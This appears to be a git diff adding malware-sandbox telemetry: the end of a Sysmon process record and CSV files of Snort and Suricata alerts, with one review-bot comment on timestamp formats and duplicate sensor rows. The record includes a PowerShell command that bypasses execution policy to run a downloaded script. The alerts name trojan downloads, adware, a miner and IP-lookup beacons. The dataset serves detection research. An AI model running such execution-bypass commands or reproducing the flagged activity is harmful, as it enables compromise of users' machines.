MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D\r\nParentProcessGuid: {df9fc3d3-b349-5ecf-0000-0010fbcf1600}\r\nParentProcessId: 2268\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" \""-Command\"" \""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\Users\\John Williams\\Downloads\\program25.ps1'\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:26.537"",""processGuid"":""{df9fc3d3-b356-5ecf-0000-001076c41800}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe"",""fileVersion"":""4.8.3752.0 built by: NET48REL1"",""description"":""Visual C# Command Line Compiler"",""product"":""Microsoft® .NET Framework"",""company"":""Microsoft Corporation"",""originalFileName"":""csc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\"" /noconfig /fullpaths @\\\""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\ee4f5jeg.cmdline\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D"",""parentProcessGuid"":""{df9fc3d3-b349-5ecf-0000-0010fbcf1600}"",""parentProcessId"":""2268"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" \\\""-Command\\\"" \\\""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\\\\Users\\\\John Williams\\\\Downloads\\\\program25.ps1'\\\""""}}}", diff --git a/data/MW_25_NIDS.csv b/data/MW_25_NIDS.csv new file mode 100644 index 0000000..981e215 --- /dev/null +++ b/data/MW_25_NIDS.csv 
@@ -0,0 +1,19 @@
+"@timestamp",message,"log.file.path"
+"May 29, 2020 @ 14:21:25.502","05/29-14:21:19.657708 [**] [1:2001569:14] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:60084 -> 192.168.8.69:445","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:21:20.612","05/29/2020-14:21:19.657708 [**] [1:2001569:15] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:60084 -> 192.168.8.69:445","/var/log/suricata/fast.log"
+"May 29, 2020 @ 14:20:25.576","05/29/2020-14:20:19.984308 [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55745 -> 192.168.2.85:1433","/var/log/suricata/fast.log"
+"May 29, 2020 @ 14:20:25.575","05/29/2020-14:20:16.318886 [**] [1:2001569:15] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55501 -> 192.168.2.96:445","/var/log/suricata/fast.log"
+"May 29, 2020 @ 14:20:20.491","05/29-14:20:16.318861 [**] [1:2001569:14] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55470 -> 192.168.2.65:445","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:20:20.491","05/29-14:20:19.984308 [**] [1:2001583:15] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:55745 -> 192.168.2.85:1433","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:19:25.473","05/29-14:19:23.650895 [**] [1:2013479:4] ET SCAN Behavioral Unusually fast Terminal Server Traffic Potential Scan or Infection (Outbound) [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:52090 -> 10.100.101.19:3389","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:19:24.468","05/29-14:19:19.961586 [**] [1:2001583:15] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51854 -> 10.100.101.39:1433","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:19:20.506","05/29/2020-14:19:19.961586 [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51854 -> 10.100.101.39:1433","/var/log/suricata/fast.log"
+"May 29, 2020 @ 14:19:17.440","05/29-14:19:16.499697 [**] [1:2001569:14] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51627 -> 10.100.101.69:445","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:19:17.435","05/29/2020-14:19:16.499697 [**] [1:2001569:15] ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:51627 -> 10.100.101.69:445","/var/log/suricata/fast.log"
+"May 29, 2020 @ 14:18:41.427","05/29-14:18:38.793907 [**] [1:2831048:2] ETPRO POLICY Observed SSL Cert (IP Lookup - ipify .org) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 50.19.115.217:443 -> 172.16.2.2:50014","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:18:41.427","05/29/2020-14:18:38.920893 [**] [1:2831048:3] ETPRO POLICY Observed SSL Cert (IP Lookup - ipify .org) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 50.19.115.217:443 -> 172.16.2.2:50014","/var/log/suricata/fast.log"
+"May 29, 2020 @ 14:18:06.410","05/29-14:17:58.191201 [**] [1:2029538:2] ET POLICY EXE Base64 Encoded potential malware [**] [Classification: Misc activity] [Priority: 3] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:18:06.410","05/29-14:17:58.191201 [**] [1:2018856:11] ET TROJAN Windows executable base64 encoded [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:18:06.410","05/29-14:18:02.035227 [**] [1:2029538:2] ET POLICY EXE Base64 Encoded potential malware [**] [Classification: Misc activity] [Priority: 3] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:18:06.410","05/29-14:18:02.035227 [**] [1:2018856:11] ET TROJAN Windows executable base64 encoded [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/snort/alert.fast"
+"May 29, 2020 @ 14:18:06.409","05/29/2020-14:17:58.522757 [**] [1:2029538:2] ET HUNTING EXE Base64 Encoded potential malware [**] [Classification: Misc activity] [Priority: 3] {TCP} 167.99.154.202:80 -> 172.16.2.2:49973","/var/log/suricata/fast.log"
diff --git a/data/MW_26_NIDS.csv b/data/MW_26_NIDS.csv
new file mode 100644
index 0000000..ccd6f4a
--- /dev/null
+++ b/data/MW_26_NIDS.csv
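Review bot: The `message` column mixes two alert-time formats and nothing in the file says so: rows from `/var/log/snort/alert.fast` carry `05/29-14:21:19.657708` while rows from `/var/log/suricata/fast.log` carry `05/29/2020-14:21:19.657708`, and `@timestamp` is several seconds later than the sensor time on every row, so it appears to be the indexing time rather than the detection time. The same packet is also present once per sensor with a different rule revision and sometimes a different category for the same SID (`[1:2029538:2]` is `ET POLICY` in the Snort row and `ET HUNTING` in the Suricata row), so any consumer that counts rows per signature will double-count unless it dedupes on SID plus the sensor timestamp. Since CSV has no comment syntax, a short data dictionary belongs in the repository README or a sibling markdown file next to `data/`, stating for `@timestamp` that it is the index time with no timezone recorded, for `message` that it is the raw fast-log line whose leading timestamp is written by the sensor in that sensor's own format, and that one row per sensor is expected so Snort/Suricata pairs are duplicates of one event.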
@@ -0,0 +1,79 @@
+"@timestamp",message,"log.file.path"
+"May 30, 2020 @ 13:55:32.536","05/30/2020-13:55:26.653837 [**] [1:2022050:3] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:32.536","05/30/2020-13:55:26.951978 [**] [1:2022051:2] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:32.536","05/30/2020-13:55:26.951978 [**] [1:2021076:2] ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:32.535","05/30/2020-13:55:26.542692 [**] [1:2016141:6] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49780 -> 217.8.117.132:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:30.509","05/30-13:55:26.542525 [**] [1:2021076:1] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:30.508","05/30-13:55:17.468932 [**] [1:2016141:3] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49780 -> 217.8.117.132:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:30.508","05/30-13:55:26.542525 [**] [1:2022050:3] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:30.508","05/30-13:55:26.542525 [**] [1:2022051:2] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:17.503","05/30/2020-13:55:17.465317 [**] [1:2400033:2750] ET DROP Spamhaus DROP Listed Traffic Inbound group 34 [**] [Classification: Misc Attack] [Priority: 2] {TCP} 217.8.117.132:80 -> 172.16.2.2:49780","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.138679 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.192526 [**] [1:2837242:3] ETPRO MALWARE Win32/OxyPumper Adware Related Header Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.192526 [**] [1:2833087:2] ETPRO TROJAN Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.275291 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:13.370275 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:14.240994 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:15.505","05/30-13:55:14.240994 [**] [1:2012810:9] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.159022 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.233200 [**] [1:2833087:2] ETPRO MALWARE Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.233200 [**] [1:2837242:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related Header Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.366310 [**] [1:2833089:4] ETPRO ADWARE_PUP Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 13.90.173.206:80 -> 172.16.2.2:49768","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.366467 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:13.686253 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:14.066809 [**] [1:2012811:6] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:56201 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:14.337680 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:14.502","05/30/2020-13:55:14.337680 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49779 -> 23.96.24.107:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:08.503","05/30-13:55:07.251486 [**] [1:2022082:1] ET POLICY External IP Lookup ip-api.com [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49771 -> 208.95.112.1:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:07.500","05/30/2020-13:55:07.481035 [**] [1:2022082:3] ET POLICY External IP Lookup ip-api.com [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49771 -> 208.95.112.1:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:06.500","05/30/2020-13:55:04.711107 [**] [1:2833087:2] ETPRO MALWARE Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:06.500","05/30/2020-13:55:04.711107 [**] [1:2837242:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related Header Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:06.500","05/30/2020-13:55:04.967125 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:06.498","05/30-13:55:04.866839 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49768 -> 13.90.173.206:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:06.498","05/30-13:55:04.966857 [**] [1:2833089:4] ETPRO MALWARE Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 13.90.173.206:80 -> 172.16.2.2:49768","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:05.497","05/30-13:55:04.684569 [**] [1:2837242:3] ETPRO MALWARE Win32/OxyPumper Adware Related Header Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:05.497","05/30-13:55:04.684569 [**] [1:2833087:2] ETPRO TROJAN Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49765 -> 172.217.16.196:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:04.497","05/30-13:55:03.262285 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:04.497","05/30-13:55:03.262285 [**] [1:2022082:1] ET POLICY External IP Lookup ip-api.com [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:04.496","05/30-13:55:02.923444 [**] [1:2828706:1] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49763 -> 88.99.66.31:443","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:03.496","05/30/2020-13:55:03.067891 [**] [1:2832295:1] ETPRO POLICY Possible External IP Lookup SSL Cert Observed (iplogger .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 88.99.66.31:443 -> 172.16.2.2:49763","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:03.496","05/30/2020-13:55:03.275596 [**] [1:2022082:3] ET POLICY External IP Lookup ip-api.com [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:03.496","05/30/2020-13:55:03.275596 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49764 -> 208.95.112.1:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:03.495","05/30-13:55:01.915159 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:55:03.495","05/30/2020-13:55:03.007948 [**] [1:2828706:3] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49763 -> 88.99.66.31:443","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:02.495","05/30/2020-13:55:01.864737 [**] [1:2828705:3] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:60987 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:02.495","05/30/2020-13:55:01.936887 [**] [1:2837243:2] ETPRO ADWARE_PUP Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49761 -> 88.99.66.31:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:55:02.495","05/30-13:55:01.864737 [**] [1:2828705:1] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:60987 -> 172.16.2.1:53","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:48:18.474","05/30/2020-13:48:10.547478 [**] [1:2833089:4] ETPRO ADWARE_PUP Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 13.90.173.206:80 -> 172.16.2.2:49980","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:14.993541 [**] [1:2023883:2] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:52409 -> 172.16.2.1:53","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.225204 [**] [1:2023882:1] ET INFO HTTP Request to a *.top domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.225204 [**] [1:2022896:4] ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.225204 [**] [1:2022550:14] ET TROJAN Possible Malicious Macro DL EXE Feb 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.661424 [**] [1:2014819:1] ET INFO Packed Executable Download [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:16.661424 [**] [1:2023464:1] ET INFO Possible EXE Download From Suspicious TLD [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.462","05/30-13:47:17.213502 [**] [1:2012252:2] ET SHELLCODE Common 0a0a0a0a Heap Spray String [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:14.993541 [**] [1:2023883:3] ET DNS Query to a *.top domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:52409 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.661470 [**] [1:2022550:18] ET MALWARE Possible Malicious Macro DL EXE Feb 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.661470 [**] [1:2022896:5] ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.661470 [**] [1:2023882:3] ET INFO HTTP Request to a *.top domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:49989 -> 172.67.161.111:80","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:18.460","05/30/2020-13:47:16.677340 [**] [1:2023464:2] ET HUNTING Possible EXE Download From Suspicious TLD [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.67.161.111:80 -> 172.16.2.2:49989","/var/log/suricata/fast.log"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:02.120295 [**] [1:2025106:3] ET INFO DNS Query for Suspicious .ml Domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:56505 -> 172.16.2.1:53","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:03.276983 [**] [1:2828705:1] ETPRO POLICY IP Check Domain (iplogger .org in DNS Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 172.16.2.2:64376 -> 172.16.2.1:53","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:03.458144 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49974 -> 88.99.66.31:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:03.506593 [**] [1:2828706:1] ETPRO POLICY IP Check Domain (iplogger .org in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49975 -> 88.99.66.31:443","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.089239 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.089239 [**] [1:2022082:1] ET POLICY External IP Lookup ip-api.com [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49978 -> 208.95.112.1:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.184789 [**] [1:2837242:3] ETPRO MALWARE Win32/OxyPumper Adware Related Header Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.184789 [**] [1:2833087:2] ETPRO TROJAN Win32/QwertMiner Suspicious UA (jdlnb) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49979 -> 172.217.16.196:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.405775 [**] [1:2837243:2] ETPRO MALWARE Win32/OxyPumper Adware Related User-Agent Observed [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49980 -> 13.90.173.206:80","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.458","05/30-13:47:05.494249 [**] [1:2833089:4] ETPRO MALWARE Win32/OxyPumper.Adware Receiving Payload Country Distribution Config [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 13.90.173.206:80 -> 172.16.2.2:49980","/var/log/snort/alert.fast"
+"May 30, 2020 @ 13:47:11.457","05/30/2020-13:47:02.120295 [**] [1:2025106:3] ET INFO DNS Query for Suspicious .ml Domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 172.16.2.2:56505 -> 172.16.2.1:53","/var/log/suricata/fast.log"
